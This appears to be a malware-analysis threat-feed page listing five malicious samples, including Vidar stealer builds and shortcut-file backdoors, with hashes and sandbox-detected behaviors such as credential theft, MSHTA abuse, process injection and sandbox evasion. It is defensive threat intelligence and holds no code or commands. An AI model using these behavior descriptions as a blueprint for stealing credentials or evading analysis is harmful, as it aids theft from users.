Threat Feed
abordin@freemail.com.br.lnk
2026-02-06T20:16:16.281
malicious
Windows Batch File (Shell Link)
Close
abordin@freemail.com.br.lnk
malicious
SHA256:
6b98973ff442c9d126ef39308c7d8b8e1f0fa20142328f7c5d7d12cdd47ca49b
VMRay Threat Identifiers
Close
Severity
Operation
5/5
Sets up server that accepts incoming connections
4/5
Abuses MSHTA to execute code
4/5
Attempts to connect through HTTPS
3/5
Suspicious content matched by YARA rules
2/5
Searches for sensitive browser data
2/5
Checks Internet connection
2/5
Downloads file
2/5
Performs DNS request
2/5
Suspicious content matched by YARA rules
1/5
Unusual large memory allocation
1/5
Accesses volumes directly
1/5
Connects to remote host
1/5
URL contains a TLD highly associated with phishing
1/5
Content matched by YARA rules
1/5
Query OS Information
Backdoor
abordin@freemail.com.br.lnk
2026-02-06T20:15:56.459
malicious
Windows Batch File (Shell Link)
Close
abordin@freemail.com.br.lnk
malicious
SHA256:
73cbf1178583bbf2bf1b85bdb0fc273979cb842fd3ca18397d6af7847a7edeba
VMRay Threat Identifiers
Close
Severity
Operation
5/5
Sets up server that accepts incoming connections
4/5
Abuses MSHTA to execute code
4/5
Attempts to connect through HTTPS
3/5
Suspicious content matched by YARA rules
2/5
Performs DNS request
2/5
Searches for sensitive browser data
1/5
Connects to remote host
1/5
Unusual large memory allocation
1/5
Query OS Information
1/5
URL contains a TLD highly associated with phishing
Backdoor
build_69862bdca4e8e.exe
2026-02-06T20:05:06.116
malicious
Windows Exe (x86-64)
Close
build_69862bdca4e8e.exe
malicious
SHA256:
5adf8dec18a90f3170616bb0b8d84be0409e0e2bb3d110b87a4bdb0d07ce54a1
VMRay Threat Identifiers
Close
Severity
Operation
5/5
Combination of other detections shows multiple input capture behaviors
5/5
Vidar configuration was extracted
5/5
Malicious content matched by YARA rules
5/5
Tries to read cached credentials of various applications
4/5
Malicious content matched by YARA rules
3/5
Uses HTTP to upload a large amount of data
3/5
Takes screenshot
3/5
Reads installed applications
2/5
Searches for sensitive browser data
2/5
Dead Drop Resolver
2/5
Allows invalid SSL certificates
2/5
Searches for sensitive mail data
2/5
Tries to detect virtual machine
1/5
Possibly does reconnaissance
1/5
Reads system data
1/5
Query OS Information
1/5
Query CPU Properties
1/5
Enumerates running processes
1/5
Tries to detect debugger
Spyware
Stealer
chromelevator.exe
2026-02-06T20:04:53.654
malicious
Windows Exe (x86-64)
Close
chromelevator.exe
malicious
SHA256:
fe4e5fb28d2c2b3a640112b6b125ce8c4afa8be28342e3bfda097ad9dd2ef9ee
VMRay Threat Identifiers
Close
Severity
Operation
5/5
Makes indirect system calls to hide process injection
5/5
Combination of other detections shows configuration discovery
4/5
Makes indirect system call to possibly evade hooking based monitoring
4/5
Malicious content matched by YARA rules
4/5
Modifies control flow of another process
4/5
Writes into the memory of another process
3/5
Suspicious content matched by YARA rules
3/5
Reads installed applications
3/5
Takes screenshot
2/5
Tries to detect virtual machine
2/5
Searches for sensitive browser data
2/5
Reads sensitive browser data
2/5
Searches for sensitive application data
2/5
Suspicious content matched by YARA rules
2/5
Tries to detect analyzer sandbox
1/5
Query OS Information
1/5
Reads system data
1/5
Query CPU Properties
1/5
Resolves API functions dynamically
1/5
A monitored process crashed
1/5
Possibly does reconnaissance
1/5
Enumerates running processes
1/5
Creates a page with write and execute permissions
1/5
Creates process with hidden window
1/5
Checks external IP address
1/5
Tries to connect using an uncommon port
Downloader
Injector
build_69862ab2d135a.exe
2026-02-06T20:04:46.944
malicious
Windows Exe (x86-64)
Close
build_69862ab2d135a.exe
malicious
SHA256:
0eda54caf4b219fb51fdd3ad07e0ef150530bb98ebac6effaba93d83291a380f
VMRay Threat Identifiers
Close
Severity
Operation
5/5
Malicious content matched by YARA rules
5/5
Tries to read cached credentials of various applications
5/5
Vidar configuration was extracted
4/5
Malicious content matched by YARA rules
4/5
Modifies control flow of another process
4/5
Writes into the memory of another process
3/5
Uses HTTP to upload a large amount of data
3/5
Reads installed applications
2/5
Tries to detect virtual machine
2/5
Reads sensitive browser data
2/5
Allows invalid SSL certificates
2/5
Searches for sensitive mail data
2/5
Searches for sensitive browser data
2/5
Suspicious content matched by YARA rules
1/5
Creates a page with write and execute permissions
1/5
Query OS Information
1/5
Reads system data
1/5
Resolves API functions dynamically
1/5
Query CPU Properties
1/5
Enumerates running processes
1/5
Creates process with hidden window
1/5
Tries to detect debugger
Spyware
Injector
Stealer